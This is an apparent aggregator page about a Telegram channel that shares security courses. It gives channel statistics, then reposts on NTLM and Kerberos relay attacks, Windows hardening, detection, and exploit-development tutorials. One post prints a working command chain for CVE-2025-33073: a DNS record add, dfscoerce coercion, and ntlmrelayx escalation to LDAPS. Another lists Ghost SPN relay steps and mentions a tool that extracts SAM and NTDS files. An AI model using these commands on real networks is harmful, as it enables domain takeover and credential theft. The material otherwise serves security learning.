Available now! Telegram Research 2025 โ the year's key insights 
All Security Engineering Courses
Open in Telegram
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Show more๐ Analytical overview of Telegram channel All Security Engineering Courses
Channel All Security Engineering Courses (@allsecurityengineeringcourses) in the English language segment is an active participant. Currently, the community unites 18 786 subscribers, ranking 7 170 in the Technologies & Applications category and 35 989 in the Russia region.
๐ Audience metrics and dynamics
Since its creation on ะฝะตะฒัะดะพะผะพ, the project has demonstrated rapid growth, gathering an audience of 18 786 subscribers.
According to the latest data from 11 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 133 over the last 30 days and by 11 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 9.50%. Within the first 24 hours after publication, content typically collects 3.09% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 784 views. Within the first day, a publication typically gains 580 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 2.
- Thematic interests: Content is focused on key topics such as git, strace, github, linux, docker.
๐ Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
โThis channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...โ
Thanks to the high frequency of updates (latest data received on 12 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
18 786
Subscribers
+1124 hours
+247 days
+13330 days
Posts Archive
Hello everyone!
We have more news about NTLM Relay! We've told the world so many times... Never mind :)
So, let's start with the sources:
1. In Win11, the Printerbug-vulnerable service now runs over TCP rather than named pipes (ncacn_np), so a POC has been created that connects to the service over ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. A service vulnerable to PetitPotam may not work by default, but we can try to enable it, for example, using the efsr_spray.py module (https://github.com/Pennyw0rth/NetExec/pull/718).
A similar trick, but this time interacting with the required named pipe to enable Remote Registry, can be used like this: echo start > \\.\pipe\winreg . All of these enablement methods are combined under a single, larger mechanism called Service Triggers, a detailed analysis of which was published by our colleagues at TrustedSec (https://trustedsec.com/blog/theres-more-than-one-way-to-trigger-a-windows-service).
Then came some wonderful news: rainbow tables for NetNTLMv1 were released (https://console.cloud.google.com/storage/browser/net-ntlmv1-tables;tab=objects?pli=1&prefix=&forceOnObjectsSortingFiltering=false). Even if it's in 2025 :)
But the most curious trick I saw today on Twitter was this one. A bug called the Kerberos Reflection Attack was released this year. In short, the system receives a TGS ticket for one device, passes it on to the attacker, and they, in turn, use it without any problems. We can exploit this CVE-2025-33073 with NTLM, for example, to bypass a signature! It's done like this:
# We attack a computer named DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
![#Exclusive ๐ฅ #First_Time_Ever ๐ฅ CyberWarFare Labs - Certified Exploit Development Professional [CEDP] 2025.6 ๐ฅ๐ ๐จโ๐ป Pas](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAoACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDVnYrESDg1VQySH5WP1zVi5/1Dfh/OmwYEC4xyeaxkrzNIu0bh5b4/1x/pUMhmjOGY/XNT+a3m7ccZpLjBgbOOOlKUU1oOLaeo+AlolJ60Ulr/AMe6/j/OitI/CiHuxLvi2f8AD+dQ2k67PLY4Papr0E2rgdeP51miNsHcGH4U3F3uiotctma2D61Vu512+Wpye9VdrY273x6YprRsOgJ/ChxbVhxsndmlaf8AHsn4/wA6KLPItUB68/zoppWVjN6tsS9VntXVBk8cD61k+RP/AM8ZP++TRRWkJ2WxDHeXcYx9nP8A3xTfIn/54v8A98miir9r5Aa1kjJaorjDc8H60UUVi9WUf//Z)
Repost from 1N73LL1G3NC3
UnderlayCopy
PowerShell toolkit that extracts locked Windows files (SAM, SYSTEM, NTDS, ...) using MFT parsing and raw disk reads.
Repost from 1N73LL1G3NC3
Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation
In an attack exploiting CVEโ2025โ58726, a bad actor would perform the following steps:
โข Identify a Ghost SPN on the target machine.
โข Register a DNS record for the Ghost SPN pointing to the attacker machine.
โข Use a Kerberos relay tool (e.g., my KrbRelayEx script, available on GitHub) to intercept the Kerberos authentication.
โข Trigger authentication for the target machine (e.g., using Printer Bug, PetitPotam, or similar).
โข Relay the Kerberos ticket back to the target machine.
โข Gain SYSTEM access via SMB and execute arbitrary commands.
P.S.
This attack targets Kerberos by abusing misconfigured SPNs; it does not affect NTLM. The fix for CVE-2025-33073 (Windows SMB Client Elevation of Privilege Vulnerability) addressed a specific SMB client issue. However, the Ghost SPN attack method bypasses that fix. The vulnerability lies in Kerberos itself, which fails to prevent authentication reflection. The same approach can be applied to other protocols that rely on Kerberos.
Repost from N/a
#hardening
#Whitepaper
#Hardware_Security
"Windows 11 Security Book:
Security by design. Security by default", Nov. 2024.
See also:
]-> Windows 11 Secured-core PCs
]-> Win10/11/2016/2019/2022 Trusted Platform Module (TPM) Settings
]-> System Guard Secure Launch and SMM protection (Win10/11)
]-> Configure BitLocker (Win10/11/2016/2019/2022/2025)
]-> Enable virtualization-based protection of code integrity
]-> Memory integrity and VBS controls
]-> Configure Hyper-V firewall (Win11 22H2)
]-> Configure Group Policy settings for MS Defender Application Guard
]-> Configure Win10/11 Sandbox
]-> Deploy App Control by using Group Policy (Win10/11/2016/2019/2022/2025)
]-> Windows 10/11 Hardening Script
Repost from N/a
#DFIR
#tools
#Blue_Team_Techniques
"Detecting Pass-the-Hash Attack in a Microsoft Active Directory Environment using an Open-Source Approach", 2024.
]-> Pass the hash in Windows 10
]-> Pass-the-hash attacks: Tools and Mitigation (.pdf)
]-> Tool to detect suspicious privileged NTLM connections (PtH attack) based on event viewer logs
Repost from Blue Team
๐๐ซ๐ฃ๐๐ข๐๐ง ๐๐๐ฉ๐๐๐ข๐ฃ๐ ๐๐ก๐ง ๐
๐ Part 1 : Intro :-
https://0xninjacyclone.github.io/posts/exploitdev_1_intro/
๐ Part 2 : Understanding Stack Memory :-
https://0xninjacyclone.github.io/posts/exploitdev_2_stack/
๐ Part 3 : Understanding Heap Memory :-
https://0xninjacyclone.github.io/posts/exploitdev_3_heap/
๐ Part 4 : Understanding Binary Files :-
https://0xninjacyclone.github.io/posts/exploitdev_4_binfiles/
๐ Part 5 : Dealing with Windows PE files programmatically :-
https://0xninjacyclone.github.io/posts/exploitdev_5_winpe/
๐ Part 6 : Dealing with ELF files programmatically :-
https://0xninjacyclone.github.io/posts/exploitdev_6_elf/
๐ Part 7 : How to do magic with string format bugs :-
https://0xninjacyclone.github.io/posts/exploitdev_7_strfmt/
๐ Part 8 : Buffer Over-Read Attacks and Developing a Real Exploit :-
https://0xninjacyclone.github.io/posts/exploitdev_8_bor/
@BlueTeamKit #exploit_development #binary_exploitation #vulnerability_research #buffer_overread
Repost from CyberSecurityTechnologies
#tools
#Space_Security
"Donโt Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites", Oct. 2025.
]-> IP encapsulation parser from raw DVB-S2(X) captures
// A shockingly large amount of sensitive traffic is being broadcast unencrypted, including critical infrastructure, internal corporate and government communications, private citizensโ voice calls and SMS, and consumer Internet traffic from in-flight wifi and mobile networks. This data can be passively observed by anyone with a few hundred dollars of consumer-grade hardware..
Repost from CyberSecurityTechnologies
#AppSec
#Offensive_security
"Finding Critical Bugs in Adobe Experience Manager", BSides 2025.
]-> Security research
]-> AEM hacking toolkit
// In this blog post, we provide an in-depth look at how AEM operates under the hood, including modern dispatcher bypasses that target real systems (CVE-2025-54251, CVE-2025-54249, CVE-2025-54252, CVE-2025-54250, CVE-2025-54247, CVE-2025-54248, CVE-2025-54246)
Repost from N/a
โ ๏ธ Kubernetes for Pentesters โ ๏ธ
A selection of articles on practical Kubernetes penetration testing:
๐ Kubernetes for Pentesters: Part 1
๐ A Pentesterโs Approach to Kubernetes Security โ Part 1
๐ A Pentesterโs Approach to Kubernetes Security โ Part 2
#red_team #kubernetes
